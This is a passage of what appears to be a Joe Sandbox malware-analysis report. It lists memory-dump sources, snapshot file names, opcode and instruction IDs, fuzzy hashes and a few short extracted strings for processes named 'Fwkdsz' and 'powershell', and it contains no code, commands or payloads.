                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: f143458fe5f57eb73222883fd4c89147fcaa0ceb8817efc4d4b43def1f62bc57
                                                                                                                                                                                                                                                • Instruction ID: 92ac003baf27bf3bd25838e112a77fe710da9e758b0cf434bcd640ea0b47636b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f143458fe5f57eb73222883fd4c89147fcaa0ceb8817efc4d4b43def1f62bc57
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5E086B4905108EBC714DF94E8549EDBBB4FB45310F50D099DC0517340C7715E52EF90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706984918.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74c0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 42b73a156255dd8655a1d19f95bbde5c1d65b7b5416d2df8ce3835da9fdff527
                                                                                                                                                                                                                                                • Instruction ID: 2199fcaccfd99606ae524e34747520083e75ae3351de0e5a5015bdc2f4e74edd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42b73a156255dd8655a1d19f95bbde5c1d65b7b5416d2df8ce3835da9fdff527
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05E01AB4D04108EBC714DF98D5655BCFBB8AB49304F10C0AA985957341C6315E06DF40
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706984918.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74c0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 42b73a156255dd8655a1d19f95bbde5c1d65b7b5416d2df8ce3835da9fdff527
                                                                                                                                                                                                                                                • Instruction ID: 708a0be3c23bc5ae1f4e3f2114ce711dbb7beeae61a9012c7d6df9fe69ec9a34
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42b73a156255dd8655a1d19f95bbde5c1d65b7b5416d2df8ce3835da9fdff527
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98E01A74D04108EFC704DB98D4545BDBBB8AB49300F10C0AA985857341C6315E02DF40
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 6242aa4612c631a1e5e455f49be98ee28eb6845115d0d5d547ca7cf65007c2f9
                                                                                                                                                                                                                                                • Instruction ID: 3494de3ace63cc07c5966fd54a438629a47f79326a3e7d2e9860dd102b03340d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6242aa4612c631a1e5e455f49be98ee28eb6845115d0d5d547ca7cf65007c2f9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CEE012B0D5520CEFCB54EFB8D845AEDBBF8AB05300F1051A9880897350EB705E45DB51
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d6286270ec549a12bc5f4fd6feb710d8b67c119d0e81bed7abe22be770f2f769
                                                                                                                                                                                                                                                • Instruction ID: ad3da9740488ab938947a919141b8707e82bade4cfbf014a06ebcdfe220ee2f4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6286270ec549a12bc5f4fd6feb710d8b67c119d0e81bed7abe22be770f2f769
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AFE01274A09108EBC714EFA8E9456EDBBB8FB46314F10D599D80C17341C7715E42DF91
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d6286270ec549a12bc5f4fd6feb710d8b67c119d0e81bed7abe22be770f2f769
                                                                                                                                                                                                                                                • Instruction ID: b71ddc6a0db408618b5bf294348dba43683caf78c6a14f5c25c440ec704e8e26
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6286270ec549a12bc5f4fd6feb710d8b67c119d0e81bed7abe22be770f2f769
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 68E0C2B4908118EBCB14DF98E8445ECBFB8EF46300F10C0A9C80817340C7316E12DF90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d6286270ec549a12bc5f4fd6feb710d8b67c119d0e81bed7abe22be770f2f769
                                                                                                                                                                                                                                                • Instruction ID: 5f1ae0473f9be04e8d41a94a3b7eaab17125e31d7584ff223096d5693dd4240a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6286270ec549a12bc5f4fd6feb710d8b67c119d0e81bed7abe22be770f2f769
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 67E0EC74949108EBC714DF98E9455EDBBBCEB45315F6081A9980817341DB319E42DB91
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d6286270ec549a12bc5f4fd6feb710d8b67c119d0e81bed7abe22be770f2f769
                                                                                                                                                                                                                                                • Instruction ID: a5961ba7dee39c63caff744f6f40afc61d1fb3fa708a723c98e5edc5052f4dc3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6286270ec549a12bc5f4fd6feb710d8b67c119d0e81bed7abe22be770f2f769
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C0E01274909108EBCB14DF99E9455EDBBBDEB85314F10C1ADD80817341CB315E52EF91
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2639786281.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_2b20000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 44bf72aebd084e6d8a6d09cabbd730e5baf497407bc7410ef47c1a3e9aa6ef9d
                                                                                                                                                                                                                                                • Instruction ID: 278068997fb307776c05e7bc14054efdeb0be07758c6d4475426a0e7add95ba0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44bf72aebd084e6d8a6d09cabbd730e5baf497407bc7410ef47c1a3e9aa6ef9d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38E01271901308EBC751EFB4D91969E7BF9EF49301F0144A6D909D7110EF315A44EBA6
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2639786281.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_2b20000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3a884d79cdd3330c8af61b169e9db162e82db5d4b7e146b42e7af15eb81ac0ec
                                                                                                                                                                                                                                                • Instruction ID: eefcd8332ab340cd07124b3214aec3b9dd24670437e55d619e8bc6f313bdfff2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a884d79cdd3330c8af61b169e9db162e82db5d4b7e146b42e7af15eb81ac0ec
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 48D02E3000EBB9AFC3022B14582C2BA7BBCDB07305F1888C2A98C4B1A7C3601859CF60
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706984918.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74c0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 61ecde4a46f204b466e794780d06560bd9a3c953b57c65ae5de1616404bbd8b1
                                                                                                                                                                                                                                                • Instruction ID: f6454dbd2380ddb4387e3a9aabf27d9c61a1b61ca615aab39c4a3e995501d32a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61ecde4a46f204b466e794780d06560bd9a3c953b57c65ae5de1616404bbd8b1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80E0C274E08108EBCB08DF98E8545ACBBB8EF49300F10C09AC80817340C7316E02DF80
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706984918.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74c0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9a2d63595237930efed5a4a10eda2f08a2bcdda32508f827f7d9e486565d3937
                                                                                                                                                                                                                                                • Instruction ID: 0a9d3da9347175c9e84042c0e6ba714145db657fe135d2c07bf3da7c4f324e5b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a2d63595237930efed5a4a10eda2f08a2bcdda32508f827f7d9e486565d3937
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7BE012B190120CABC751FFB598146AE7BF9DF45300F1144A6950997210EA315A44EBD6
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: a287f56736fe82d71e55f9042c6e57b69361c654755be36f8464512b165130cc
                                                                                                                                                                                                                                                • Instruction ID: dcda91cdd9672a524f715ba009ff886d0b122781954d2054da0e98928f62c257
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a287f56736fe82d71e55f9042c6e57b69361c654755be36f8464512b165130cc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FCE0E5759051189BDB61DF58C850BDA7BB9BB48300F1451A6E109E3284DA34AE848F60
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c5e1c9a6fd0b1c66afd2c6bec96fd38a41b36bb1bb980d1c7d3a9e1320e65faf
                                                                                                                                                                                                                                                • Instruction ID: cec559721701f4348a5fb818cc93cec014bf9036cfdd8d102de8bb8e41c9d890
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c5e1c9a6fd0b1c66afd2c6bec96fd38a41b36bb1bb980d1c7d3a9e1320e65faf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19E0EDB49061289BDBA4DF25CC95BD9B671AB50300F1080D695497B281DB714F84CF50
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e03957c2ff2c4f75ff0838480cb71bf10a0f1290d47f3ffde84f81725f61dedc
                                                                                                                                                                                                                                                • Instruction ID: 0347133629973f0df47dc58feaf0cccec9acf901f4ce7da5dc06432bb489f9d5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e03957c2ff2c4f75ff0838480cb71bf10a0f1290d47f3ffde84f81725f61dedc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09E08C74C04108AFCB10DFA9D8142ECBBF8EB05200F10809AD80857341DA319E02DF91
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e03957c2ff2c4f75ff0838480cb71bf10a0f1290d47f3ffde84f81725f61dedc
                                                                                                                                                                                                                                                • Instruction ID: 29694e4099325180109314414d3fe6fc0880b2c66d83096b7e3b96db4da9c6da
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e03957c2ff2c4f75ff0838480cb71bf10a0f1290d47f3ffde84f81725f61dedc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51E08C7080810CABC764DBA8E4152ECBBB8AB06200F10809A884857341D7319E02DB51
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 594b765b02d193602d09fb1b4ef2400e7014e455ceec66b1d6c058fda9aa87c9
                                                                                                                                                                                                                                                • Instruction ID: 469f5bd3d5c4af9937959d629584d4e79d64c542e1170e87cea1fa8e8eb63a71
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 594b765b02d193602d09fb1b4ef2400e7014e455ceec66b1d6c058fda9aa87c9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1ED05EB0509108EBCB14DF9AE804AEAB7BCEB4A314F20849D980857341CA33AD02DB50
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706984918.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74c0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2dd089a5a3e5165385ba1e79015ea88f9544b5484c04422431c28167553b6a29
                                                                                                                                                                                                                                                • Instruction ID: 3eb6e920f945618d8a913b18e092ea374e304a4469735aefe4498776488e8407
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2dd089a5a3e5165385ba1e79015ea88f9544b5484c04422431c28167553b6a29
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F0C02BB005B304C3D5242359F53CFF532FC5703B01F442801DD4C0801287E00800DF51
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2639786281.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_2b20000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2df54f3aa7a5a48ab5d5034d2b3ab57a3d4053abaa6a57e6c7c54fca03c53c2d
                                                                                                                                                                                                                                                • Instruction ID: 19a337d51214a67818abf850d7280be6d5e5fc6df6cf053022c2198562f40fc2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2df54f3aa7a5a48ab5d5034d2b3ab57a3d4053abaa6a57e6c7c54fca03c53c2d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2C08C3001A2089FD6947BAABE0D3783BA8AB40306F840051EE0C840518B740080EF6A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2471064208.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_4710000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: {Y@n^$Y@n^
                                                                                                                                                                                                                                                • API String ID: 0-2719519199
                                                                                                                                                                                                                                                • Opcode ID: 5aa578d8ad3c85f041ae35d917c128b16082792873c1d3c08313532810b5a6d9
                                                                                                                                                                                                                                                • Instruction ID: 7ef31843877c94ee8173c87df6f140d547780d8d947a663f457f69a86c5b6df9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5aa578d8ad3c85f041ae35d917c128b16082792873c1d3c08313532810b5a6d9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E9190B1F016595BDB1AEFB4C4116AEB7F3EF84604B00892DD40AAB354DF746D0A8BC6
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2471064208.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_4710000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: {Y@n^$Y@n^
                                                                                                                                                                                                                                                • API String ID: 0-2719519199
                                                                                                                                                                                                                                                • Opcode ID: b09976690672f97c90f4d80717253aed87c95e41c379d92c929315efbcd35383
                                                                                                                                                                                                                                                • Instruction ID: 05cb356725d4f7bdd943b23db9668f7d2700f69317dfe50cef9426e8f90d5d5e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b09976690672f97c90f4d80717253aed87c95e41c379d92c929315efbcd35383
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A9160B1F016195BDB1AEFB4C4156AEB6F3EF84704B00892DD50AAB344DF746D0A8BC6
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2476975746.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7240000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                                                                                                • API String ID: 0-1420252700
                                                                                                                                                                                                                                                • Opcode ID: 45c31ac37a37545248d1cfb9fe365bbd061573844a34ec3adb363c760737e8d2
                                                                                                                                                                                                                                                • Instruction ID: fbe74c5e9e5e4d686f78b8ceb0314fbbffae37c6ae30f0e1e13484412f520074
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 45c31ac37a37545248d1cfb9fe365bbd061573844a34ec3adb363c760737e8d2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 721269F1B242929FCB19DB6884017AABBF29FC5311F14846AD505DF382EF35D846C7A1
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2471064208.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_4710000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: (bq
                                                                                                                                                                                                                                                • API String ID: 0-149360118
                                                                                                                                                                                                                                                • Opcode ID: 0e33b6f4289c2085d5be777d1dab964165a35e050e904407a4f39e8cdef68abb
                                                                                                                                                                                                                                                • Instruction ID: 3938b15ad9c06207569c4e32b29ec3bbc596fa1e61af4440289eebcc48c527b8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e33b6f4289c2085d5be777d1dab964165a35e050e904407a4f39e8cdef68abb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D413C34B042048FCB19DFA9C564AAEBBF2EF8D711F148498D406AB3A1DB35ED01CB61
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2471064208.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_4710000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: (&^q
                                                                                                                                                                                                                                                • API String ID: 0-2067289071
                                                                                                                                                                                                                                                • Opcode ID: bb34f56927260f76c334031ca19f878513d727a1a4bfab6a3c8a1aaf2f5809d7
                                                                                                                                                                                                                                                • Instruction ID: 404260e29ec8e98a420f8c1f11de0649834c950764256839120c83d67e979626
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb34f56927260f76c334031ca19f878513d727a1a4bfab6a3c8a1aaf2f5809d7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B21B071A002588FCB14DFAED84469EBBF5EF89320F14846AD019E7340CA75A9458FE5
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2476975746.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7240000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: b3ddcdb17b8d9d55d53552d663cca92d58f92fc31866ab846c51cbb2de15d518
                                                                                                                                                                                                                                                • Instruction ID: 7e47c12dbf0044e5cf80392b12212efbf26bac2a7f6242708b2a5e4301d7377d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3ddcdb17b8d9d55d53552d663cca92d58f92fc31866ab846c51cbb2de15d518
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1BB14BB1B34216DFCB189B6988417AABBE2BF89321F1480B6E905DF241DF35DD41C7A1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2471064208.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_4710000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: acf56ba2bc479c201d8c220109bac92dc8773e484ea7b4f18706179637b28fc2
                                                                                                                                                                                                                                                • Instruction ID: 3bd21df25a9d50f8700f6cc17fe4bc0f4374f19eb1653d65846d10c02727f5cb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: acf56ba2bc479c201d8c220109bac92dc8773e484ea7b4f18706179637b28fc2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27916A74A006458FCB15CF5CC4989AEFBB1FF88310B24869AD955AB3A6C735FC51CBA0
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2471064208.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_4710000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 15f5cdd733f1ee1d6edfcb90c8f55274657d1cd29297c51e53ee80aa73dedd96
                                                                                                                                                                                                                                                • Instruction ID: a1591cdee8b40b3736e77a8954da5aa23744a4b75f7b5d0c4aa73dedffe6823a
